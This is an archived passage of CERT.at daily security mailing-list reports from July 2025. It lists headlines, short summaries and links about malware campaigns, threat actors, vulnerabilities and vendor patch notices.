https://unit42.paloaltonetworks.com/homograph-attacks/ ∗∗∗ ToxicPanda: The Android Banking Trojan Targeting Europe ∗∗∗ --------------------------------------------- What is ToxicPanda? Bitsight Trace dives into detail on the banking malware, from impact breadth, delivery, technical analysis, and more. --------------------------------------------- https://www.bitsight.com/blog/toxicpanda-android-banking-malware-2025-study ∗∗∗ EU-Satelliteninternet: UK, Norwegen und Ukraine können sich IRIS2 anschließen ∗∗∗ --------------------------------------------- EU-Raumfahrtkommissar Kubiliius hat europäische Drittstaaten eingeladen, bei dem als Starlink-Alternative gedachten Satellitennetzwerk IRIS2 voll einzusteigen. --------------------------------------------- https://www.heise.de/news/EU-Satelliteninternet-UK-Norwegen-und-Ukraine-koe… ∗∗∗ How I hacked my washing machine ∗∗∗ --------------------------------------------- If you've known me for some amount of time you knew this was something that was bound to happen eventually. Yesterday (and technically today), me and a friend went on an endeavor to hack our washing machine, partially for the fun of it, and partially because there's actually a practical use for it. --------------------------------------------- https://nexy.blog/2025/07/27/how-i-hacked-my-washing-machine/ ∗∗∗ Protecting the Evidence in Real-Time with KQL Queries ∗∗∗ --------------------------------------------- A few weeks ago, I published a post titled Detecting Ransomware Final Stage Activities with KQL Queries where I shared different phases and detections during the last phase of a ransomware attack. Every time I read it, I realize just how broad and complex this topic truly is. --------------------------------------------- https://detect.fyi/protecting-the-evidence-in-real-time-with-kql-queries-ac… ∗∗∗ Lionishackers: Analyzing a corporate database seller ∗∗∗ --------------------------------------------- Outpost24’s threat intelligence researchers have been analyzing a corporate database seller known as "Lionishackers". They’re a financially motivated threat actor focused on exfiltrating and selling corporate databases. This post explores how they operate, where their attacks are taking place, and the current level of threat they pose. --------------------------------------------- https://outpost24.com/blog/lionishackers-corporate-database-seller/ ===================== = Vulnerabilities = ===================== ∗∗∗ Post SMTP plugin flaw exposes 200K WordPress sites to hijacking attacks ∗∗∗ --------------------------------------------- More than 200,000 WordPress websites are using a vulnerable version of the Post SMTP plugin that allows hackers to take control of the administrator account. --------------------------------------------- https://www.bleepingcomputer.com/news/security/post-smtp-plugin-flaw-expose… ∗∗∗ Critical Flaws in Niagara Framework Threaten Smart Buildings and Industrial Systems Worldwide ∗∗∗ --------------------------------------------- Cybersecurity researchers have discovered over a dozen security vulnerabilities impacting Tridiums Niagara Framework that could allow an attacker on the same network to compromise the system under certain circumstances. --------------------------------------------- https://thehackernews.com/2025/07/critical-flaws-in-niagara-framework.html ∗∗∗ Support ausgelaufen: Admin-Attacke auf LG Netzwerkkamera LNV5110R möglich ∗∗∗ --------------------------------------------- Die Netzwerkkamera LNV5110R von LG Innotek sollte nicht mehr benutzt werden: Die US-Sicherheitsbehörde CISA (Cybersecurity & Infrastructure Security Agency) warnt vor einer Sicherheitslücke, für die es kein Sicherheitsupdate mehr geben wird. --------------------------------------------- https://www.heise.de/news/Support-ausgelaufen-Admin-Attacke-auf-LG-Netzwerk… ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (audiofile, libcaca, libetpan, libxml2, php7.4, snapcast, and thunderbird), Fedora (glibc, iputils, mingw-binutils, and thunderbird), Red Hat (kernel, kernel-rt, mod_auth_openidc, and mod_auth_openidc:2.3), SUSE (afterburn, apache2, atop, chromedriver, chromium, cloud-init, deepin-feature-enable, firefox, firefox-esr, grafana, grype-db, gstreamer-plugins-bad, javamail, jupyter-jupyterlab-templates, jupyter-nbdime, konsole, libetebase, libxmp, minio-client-20250721T052808Z, MozillaFirefox, MozillaFirefox-branding-SLE, opera, pdns-recursor, perl-Authen-SASL, polkit, python-Django, python3-pycares, python311-starlette, rpi-imager, ruby3.4-rubygem-thor, spdlog, thunderbird, varnish, viewvc, and xtrabackup), and Ubuntu (openjdk-21-crac). --------------------------------------------- https://lwn.net/Articles/1031667/ ∗∗∗ Sicherheitsproblem: Hartkodierte Zugangsdaten gefährden PCs mit MyASUS ∗∗∗ --------------------------------------------- Die MyASUS-App kann zum Einfallstor für Angreifer werden. Schuld sind zwei Sicherheitslücken, die aber mittlerweile geschlossen sind. Wer das Tool nicht aktualisiert, riskiert unbefugte Zugriffe auf bestimmte Services. --------------------------------------------- https://www.heise.de/news/Sicherheitsproblem-Hartkodierte-Zugangsdaten-gefa… ∗∗∗ SyStrack LsiAgent.exe contains an improper DLL search order, allowing an attacker to execute arbitrary code and priv esc ∗∗∗ --------------------------------------------- https://kb.cert.org/vuls/id/335798 ∗∗∗ Mehrere Stored Cross-Site Scripting Schwachstellen im Optimizely Episerver Content Management System ∗∗∗ --------------------------------------------- https://sec-consult.com/de/vulnerability-lab/advisory/mehrere-stored-cross-… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 25.07.2025
by Daily end-of-shift report 25 Jul '25

25 Jul '25

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 24-07-2025 18:00 − Freitag 25-07-2025 18:00 Handler: Guenes Holler Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Hacker sneaks infostealer malware into early access Steam game ∗∗∗ --------------------------------------------- A threat actor called EncryptHub has compromised a game on Steam to distribute info-stealing malware to unsuspecting users downloading the title. A few days ago, the hacker (also tracked as Larva-208), injected malicious binaries into the Chemia game files hosted on Steam. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hacker-sneaks-infostealer-ma… ∗∗∗ New Koske Linux malware hides in cute panda images ∗∗∗ --------------------------------------------- A new Linux malware named Koske may have been developed with artificial intelligence and is using seemingly benign JPEG images of panda bears to deploy malware directly into system memory. Researchers from cybersecurity company AquaSec analyzed Koske and described it as "a sophhisticated Linux threat." Based on the observed adaptive behavior, the researchers believe that the malware was developed using large language models (LLMs) or automation frameworks. --------------------------------------------- https://www.bleepingcomputer.com/news/security/new-koske-linux-malware-hide… ∗∗∗ CastleLoader Malware Infects 469 Devices Using Fake GitHub Repos and ClickFix Phishing ∗∗∗ --------------------------------------------- Cybersecurity researchers have shed light on a new versatile malware loader called CastleLoader that has been put to use in campaigns distributing various information stealers and remote access trojans (RATs). The activity employs Cloudflare-themed ClickFix phishing attacks and fake GitHub repositories opened under the names of legitimate applications, Swiss cybersecurity company PRODAFT said in a report shared with The Hacker News. --------------------------------------------- https://thehackernews.com/2025/07/castleloader-malware-infects-469.html ∗∗∗ Phishers Target Aviation Execs to Scam Customers ∗∗∗ --------------------------------------------- KrebsOnSecurity recently heard from a reader whose boss’s email account got phished and was used to trick one of the company’s customers into sending a large payment to scammers. An investigation into the attacker’s infrastructure points to a long-running Nigerian cybercrime ring that is actively targeting established companies in the transportation and aviation industries. --------------------------------------------- https://krebsonsecurity.com/2025/07/phishers-target-aviation-execs-to-scam-… ∗∗∗ From Help Desk to Hypervisor: Defending Your VMware vSphere Estate from UNC3944 ∗∗∗ --------------------------------------------- In mid 2025, Google Threat Intelligence Group (GITG) identified a sophisticated and aggressive cyber campaign targeting multiple industries, including retail, airline, and insurance. This was the work of UNC3944, a financially motivated threat group that has exhibited overlaps with public reporting of "0ktapus," "Octo Tempest," and "Scattered Spider." Following public alerts from the Federal Bureau of Investigation (FBI), the group's targeting became clear. GTIG observed that the group was suspected of turning its ransomware and extortion operations to the U.S. retail sector. The campaign soon broadened further, with airline and transportation organizations in North America having also become targets. --------------------------------------------- https://cloud.google.com/blog/topics/threat-intelligence/defending-vsphere-… ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Friday ∗∗∗ --------------------------------------------- Security updates have been issued by AlmaLinux (git, kernel, nginx:1.24, and sudo), Fedora (dpkg, java-21-openjdk, java-25-openjdk, java-latest-openjdk, and valkey), Oracle (apache-commons-vfs, sudo, tigervnc, and xorg-x11-server), Red Hat (kernel, krb5, and openssh), SUSE (gnutls, ImageMagick, iputils, kernel-livepatch-MICRO-6-0-RT_Update_10, kubernetes1.18, libarchive, ovmf, python, and salt), and Ubuntu (iputils, linux-aws-6.14, linux-raspi, openjdk-21, and openjdk-24). --------------------------------------------- https://lwn.net/Articles/1031426/ ∗∗∗ Angriffe gegen Citrix Netscaler CVE-2025-6543 ∗∗∗ --------------------------------------------- https://www.cert.at/de/aktuelles/2025/7/angriffe-gegen-citrix-netscaler-cve… ∗∗∗ CVE-2025-38350 - ZDI-25-651: (Pwn2Own) Red Hat Enterprise Linux CBS Packet Scheduling Use-After-Free Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-25-651/ ∗∗∗ Cisco Identity Services Engine Unauthenticated Remote Code Execution Vulnerabilities ∗∗∗ --------------------------------------------- https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso… ∗∗∗ CISA Releases Six Industrial Control Systems Advisories ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/alerts/2025/07/24/cisa-releases-six-indust… ∗∗∗ Medtronic MyCareLink Patient Monitor ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-205-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0